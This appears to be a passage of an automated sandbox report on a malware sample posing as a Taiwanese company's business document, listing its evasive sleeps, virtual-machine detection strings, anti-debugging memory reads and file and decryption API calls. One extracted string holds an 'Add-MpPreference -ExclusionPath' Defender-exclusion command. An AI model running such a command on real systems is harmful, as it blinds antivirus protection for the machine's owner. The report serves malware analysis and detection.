Source: C:\Windows\SysWOW64\control.exe TID: 6196	Thread sleep count: 49 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe TID: 6196	Thread sleep time: -98000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe TID: 3212	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe TID: 5008	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe TID: 6396	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_0-2442

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

API coverage: 9.0 %

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 5_2_004088D0 rdtsc

5_2_004088D0

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Thread delayed: delay time: 36114	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: image.exe, 00000002.00000002.305862911.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: explorer.exe, 00000006.00000000.319812405.000000000EF02000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: 2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000_M.
Source: image.exe, 00000002.00000002.305862911.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000006.00000000.352031526.00000000086C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: image.exe, 00000002.00000002.305862911.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000006.00000000.336698892.0000000008778000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 00000006.00000000.347994518.00000000067C2000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.352031526.00000000086C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 00000006.00000000.347994518.00000000067C2000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: explorer.exe, 00000006.00000000.319812405.000000000EF02000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: 6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}C:\WindOJ>
Source: explorer.exe, 00000006.00000000.319812405.000000000EF02000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: 0d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&RL+
Source: explorer.exe, 00000006.00000000.352031526.00000000086C9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: image.exe, 00000002.00000002.305862911.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Windows\SysWOW64\control.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe

Code function: 0_2_00007FF6EB1464E4 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,

0_2_00007FF6EB1464E4

Source: C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe	Code function: 0_2_00007FF6EB14204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_00007FF6EB14204C
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_00E4FA90 FindFirstFileW,FindNextFileW,FindClose,	11_2_00E4FA90
Source: C:\Windows\SysWOW64\control.exe	Code function: 11_2_00E4FA8B FindFirstFileW,FindNextFileW,FindClose,	11_2_00E4FA8B

Source: C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe

Code function: 0_2_00007FF6EB1430EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,

0_2_00007FF6EB1430EC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A890AF mov eax, dword ptr fs:[00000030h]	5_2_00A890AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A720A0 mov eax, dword ptr fs:[00000030h]	5_2_00A720A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A720A0 mov eax, dword ptr fs:[00000030h]	5_2_00A720A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A720A0 mov eax, dword ptr fs:[00000030h]	5_2_00A720A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A720A0 mov eax, dword ptr fs:[00000030h]	5_2_00A720A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A720A0 mov eax, dword ptr fs:[00000030h]	5_2_00A720A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A720A0 mov eax, dword ptr fs:[00000030h]	5_2_00A720A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A7F0BF mov ecx, dword ptr fs:[00000030h]	5_2_00A7F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A7F0BF mov eax, dword ptr fs:[00000030h]	5_2_00A7F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A7F0BF mov eax, dword ptr fs:[00000030h]	5_2_00A7F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A49080 mov eax, dword ptr fs:[00000030h]	5_2_00A49080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00AC3884 mov eax, dword ptr fs:[00000030h]	5_2_00AC3884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00AC3884 mov eax, dword ptr fs:[00000030h]	5_2_00AC3884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A458EC mov eax, dword ptr fs:[00000030h]	5_2_00A458EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00ADB8D0 mov eax, dword ptr fs:[00000030h]	5_2_00ADB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00ADB8D0 mov ecx, dword ptr fs:[00000030h]	5_2_00ADB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00ADB8D0 mov eax, dword ptr fs:[00000030h]	5_2_00ADB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00ADB8D0 mov eax, dword ptr fs:[00000030h]	5_2_00ADB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00ADB8D0 mov eax, dword ptr fs:[00000030h]	5_2_00ADB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00ADB8D0 mov eax, dword ptr fs:[00000030h]	5_2_00ADB8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A7002D mov eax, dword ptr fs:[00000030h]	5_2_00A7002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A7002D mov eax, dword ptr fs:[00000030h]	5_2_00A7002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A7002D mov eax, dword ptr fs:[00000030h]	5_2_00A7002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A7002D mov eax, dword ptr fs:[00000030h]	5_2_00A7002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A7002D mov eax, dword ptr fs:[00000030h]	5_2_00A7002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A5B02A mov eax, dword ptr fs:[00000030h]	5_2_00A5B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A5B02A mov eax, dword ptr fs:[00000030h]	5_2_00A5B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A5B02A mov eax, dword ptr fs:[00000030h]	5_2_00A5B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A5B02A mov eax, dword ptr fs:[00000030h]	5_2_00A5B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B14015 mov eax, dword ptr fs:[00000030h]	5_2_00B14015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B14015 mov eax, dword ptr fs:[00000030h]	5_2_00B14015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00AC7016 mov eax, dword ptr fs:[00000030h]	5_2_00AC7016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00AC7016 mov eax, dword ptr fs:[00000030h]	5_2_00AC7016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00AC7016 mov eax, dword ptr fs:[00000030h]	5_2_00AC7016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B02073 mov eax, dword ptr fs:[00000030h]	5_2_00B02073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B11074 mov eax, dword ptr fs:[00000030h]	5_2_00B11074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A60050 mov eax, dword ptr fs:[00000030h]	5_2_00A60050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A60050 mov eax, dword ptr fs:[00000030h]	5_2_00A60050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A761A0 mov eax, dword ptr fs:[00000030h]	5_2_00A761A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A761A0 mov eax, dword ptr fs:[00000030h]	5_2_00A761A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00AC69A6 mov eax, dword ptr fs:[00000030h]	5_2_00AC69A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00AC51BE mov eax, dword ptr fs:[00000030h]	5_2_00AC51BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00AC51BE mov eax, dword ptr fs:[00000030h]	5_2_00AC51BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00AC51BE mov eax, dword ptr fs:[00000030h]	5_2_00AC51BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00AC51BE mov eax, dword ptr fs:[00000030h]	5_2_00AC51BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A7A185 mov eax, dword ptr fs:[00000030h]	5_2_00A7A185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A6C182 mov eax, dword ptr fs:[00000030h]	5_2_00A6C182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A72990 mov eax, dword ptr fs:[00000030h]	5_2_00A72990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A4B1E1 mov eax, dword ptr fs:[00000030h]	5_2_00A4B1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A4B1E1 mov eax, dword ptr fs:[00000030h]	5_2_00A4B1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A4B1E1 mov eax, dword ptr fs:[00000030h]	5_2_00A4B1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00AD41E8 mov eax, dword ptr fs:[00000030h]	5_2_00AD41E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A64120 mov eax, dword ptr fs:[00000030h]	5_2_00A64120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A64120 mov eax, dword ptr fs:[00000030h]	5_2_00A64120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A64120 mov eax, dword ptr fs:[00000030h]	5_2_00A64120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A64120 mov eax, dword ptr fs:[00000030h]	5_2_00A64120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A64120 mov ecx, dword ptr fs:[00000030h]	5_2_00A64120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A7513A mov eax, dword ptr fs:[00000030h]	5_2_00A7513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A7513A mov eax, dword ptr fs:[00000030h]	5_2_00A7513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A49100 mov eax, dword ptr fs:[00000030h]	5_2_00A49100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A49100 mov eax, dword ptr fs:[00000030h]	5_2_00A49100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A49100 mov eax, dword ptr fs:[00000030h]	5_2_00A49100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A4C962 mov eax, dword ptr fs:[00000030h]	5_2_00A4C962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A4B171 mov eax, dword ptr fs:[00000030h]	5_2_00A4B171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A4B171 mov eax, dword ptr fs:[00000030h]	5_2_00A4B171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A6B944 mov eax, dword ptr fs:[00000030h]	5_2_00A6B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A6B944 mov eax, dword ptr fs:[00000030h]	5_2_00A6B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A452A5 mov eax, dword ptr fs:[00000030h]	5_2_00A452A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A452A5 mov eax, dword ptr fs:[00000030h]	5_2_00A452A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A452A5 mov eax, dword ptr fs:[00000030h]	5_2_00A452A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A452A5 mov eax, dword ptr fs:[00000030h]	5_2_00A452A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A452A5 mov eax, dword ptr fs:[00000030h]	5_2_00A452A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A5AAB0 mov eax, dword ptr fs:[00000030h]	5_2_00A5AAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A5AAB0 mov eax, dword ptr fs:[00000030h]	5_2_00A5AAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A7FAB0 mov eax, dword ptr fs:[00000030h]	5_2_00A7FAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A7D294 mov eax, dword ptr fs:[00000030h]	5_2_00A7D294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A7D294 mov eax, dword ptr fs:[00000030h]	5_2_00A7D294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A72AE4 mov eax, dword ptr fs:[00000030h]	5_2_00A72AE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A72ACB mov eax, dword ptr fs:[00000030h]	5_2_00A72ACB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A84A2C mov eax, dword ptr fs:[00000030h]	5_2_00A84A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A84A2C mov eax, dword ptr fs:[00000030h]	5_2_00A84A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B0AA16 mov eax, dword ptr fs:[00000030h]	5_2_00B0AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B0AA16 mov eax, dword ptr fs:[00000030h]	5_2_00B0AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A58A0A mov eax, dword ptr fs:[00000030h]	5_2_00A58A0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A4AA16 mov eax, dword ptr fs:[00000030h]	5_2_00A4AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A4AA16 mov eax, dword ptr fs:[00000030h]	5_2_00A4AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A45210 mov eax, dword ptr fs:[00000030h]	5_2_00A45210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A45210 mov ecx, dword ptr fs:[00000030h]	5_2_00A45210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A45210 mov eax, dword ptr fs:[00000030h]	5_2_00A45210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A45210 mov eax, dword ptr fs:[00000030h]	5_2_00A45210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A63A1C mov eax, dword ptr fs:[00000030h]	5_2_00A63A1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00AFB260 mov eax, dword ptr fs:[00000030h]	5_2_00AFB260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00AFB260 mov eax, dword ptr fs:[00000030h]	5_2_00AFB260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A8927A mov eax, dword ptr fs:[00000030h]	5_2_00A8927A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B18A62 mov eax, dword ptr fs:[00000030h]	5_2_00B18A62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A49240 mov eax, dword ptr fs:[00000030h]	5_2_00A49240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A49240 mov eax, dword ptr fs:[00000030h]	5_2_00A49240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A49240 mov eax, dword ptr fs:[00000030h]	5_2_00A49240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A49240 mov eax, dword ptr fs:[00000030h]	5_2_00A49240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B0EA55 mov eax, dword ptr fs:[00000030h]	5_2_00B0EA55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00AD4257 mov eax, dword ptr fs:[00000030h]	5_2_00AD4257
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A74BAD mov eax, dword ptr fs:[00000030h]	5_2_00A74BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A74BAD mov eax, dword ptr fs:[00000030h]	5_2_00A74BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A74BAD mov eax, dword ptr fs:[00000030h]	5_2_00A74BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B15BA5 mov eax, dword ptr fs:[00000030h]	5_2_00B15BA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A51B8F mov eax, dword ptr fs:[00000030h]	5_2_00A51B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A51B8F mov eax, dword ptr fs:[00000030h]	5_2_00A51B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00AFD380 mov ecx, dword ptr fs:[00000030h]	5_2_00AFD380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A72397 mov eax, dword ptr fs:[00000030h]	5_2_00A72397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A7B390 mov eax, dword ptr fs:[00000030h]	5_2_00A7B390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B0138A mov eax, dword ptr fs:[00000030h]	5_2_00B0138A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A703E2 mov eax, dword ptr fs:[00000030h]	5_2_00A703E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A703E2 mov eax, dword ptr fs:[00000030h]	5_2_00A703E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A703E2 mov eax, dword ptr fs:[00000030h]	5_2_00A703E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A703E2 mov eax, dword ptr fs:[00000030h]	5_2_00A703E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A703E2 mov eax, dword ptr fs:[00000030h]	5_2_00A703E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A703E2 mov eax, dword ptr fs:[00000030h]	5_2_00A703E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A6DBE9 mov eax, dword ptr fs:[00000030h]	5_2_00A6DBE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00AC53CA mov eax, dword ptr fs:[00000030h]	5_2_00AC53CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00AC53CA mov eax, dword ptr fs:[00000030h]	5_2_00AC53CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B0131B mov eax, dword ptr fs:[00000030h]	5_2_00B0131B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A4DB60 mov ecx, dword ptr fs:[00000030h]	5_2_00A4DB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A73B7A mov eax, dword ptr fs:[00000030h]	5_2_00A73B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A73B7A mov eax, dword ptr fs:[00000030h]	5_2_00A73B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A4DB40 mov eax, dword ptr fs:[00000030h]	5_2_00A4DB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B18B58 mov eax, dword ptr fs:[00000030h]	5_2_00B18B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A4F358 mov eax, dword ptr fs:[00000030h]	5_2_00A4F358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00A5849B mov eax, dword ptr fs:[00000030h]	5_2_00A5849B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B014FB mov eax, dword ptr fs:[00000030h]	5_2_00B014FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00AC6CF0 mov eax, dword ptr fs:[00000030h]	5_2_00AC6CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00AC6CF0 mov eax, dword ptr fs:[00000030h]	5_2_00AC6CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00AC6CF0 mov eax, dword ptr fs:[00000030h]	5_2_00AC6CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 5_2_00B18CD6 mov eax, dword ptr fs:[00000030h]	5_2_00B18CD6
